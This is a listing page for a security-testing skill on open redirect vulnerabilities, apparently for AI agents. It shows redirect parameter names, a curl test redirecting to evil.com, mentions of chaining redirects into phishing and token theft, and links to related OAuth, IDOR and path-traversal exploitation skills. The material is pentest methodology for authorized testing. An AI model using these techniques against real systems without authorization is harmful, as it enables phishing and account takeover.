testing-for-open-redirect-vulnerabilities

Featured

Identify and test open redirect vulnerabilities in web applications by analyzing URL redirection parameters, bypass techniques, and exploitation chains for phishing and token theft.

AI & Automation 12,642 stars 1468 forks Updated today Apache-2.0

Install

View on GitHub

Quality Score: 99/100

Stars 20%
100
Recency 20%
100
Frontmatter 20%
70
Documentation 15%
100
Issue Health 10%
50
License 10%
100
Description 5%
100

Skill Content

# Testing for Open Redirect Vulnerabilities ## When to Use - When testing login/logout flows that redirect users to specified URLs - During assessment of OAuth authorization endpoints with redirect_uri parameters - When auditing applications with URL parameters (next, url, redirect, return, goto, target) - During phishing simulation to chain open redirects with credential harvesting - When testing SSO implementations for redirect validation weaknesses ## Prerequisites - Burp Suite or OWASP ZAP for intercepting redirect requests - Collection of open redirect bypass payloads - External domain or Burp Collaborator for redirect confirmation - Understanding of URL parsing and encoding schemes - Browser with developer tools for observing redirect chains - Knowledge of HTTP 301/302/303/307/308 redirect status codes > **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws. ## Workflow ### Step 1 — Identify Redirect Parameters ```bash # Common redirect parameter names to test: # ?url= ?redirect= ?next= ?return= ?returnUrl= ?goto= ?target= # ?dest= ?destination= ?redir= ?redirect_uri= ?continue= ?view= # Search for redirect parameters in the application # Use Burp Suite to crawl and identify all parameters # Test basic redirect curl -v "http://target.com/login?next=https://evil.com" curl -v "http://target.com/l...

Details

Author
mukul975
Repository
mukul975/Anthropic-Cybersecurity-Skills
Created
3 months ago
Last Updated
today
Language
Python
License
Apache-2.0

Similar Skills

Semantically similar based on skill content — not just same category

AI & Automation Featured

exploiting-oauth-misconfiguration

Identifying and exploiting OAuth 2.0 and OpenID Connect misconfigurations including redirect URI manipulation, token leakage, and authorization code theft during security assessments.

12,642 Updated today
mukul975
Testing & QA Featured

testing-oauth2-implementation-flaws

Tests OAuth 2.0 and OpenID Connect implementations for security flaws including authorization code interception, redirect URI manipulation, CSRF in OAuth flows, token leakage, scope escalation, and PKCE bypass. The tester evaluates the authorization server, client application, and token handling for common misconfigurations that enable account takeover or unauthorized access. Activates for requests involving OAuth security testing, OIDC vulnerability assessment, OAuth2 redirect bypass, or authorization code flow testing.

12,642 Updated today
mukul975
Testing & QA Featured

idor-testing

Provide systematic methodologies for identifying and exploiting Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.

39,227 Updated today
sickn33
AI & Automation Featured

file-path-traversal

Identify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code.

39,227 Updated today
sickn33
Testing & QA Solid

idor-vulnerability-testing

This skill should be used when the user asks to "test for insecure direct object references," "find IDOR vulnerabilities," "exploit broken access control," "enumerate user IDs or object references," or "bypass authorization to access other users' data." It provides comprehensive guidance for detecting, exploiting, and remediating IDOR vulnerabilities in web applications.

27,681 Updated today
davila7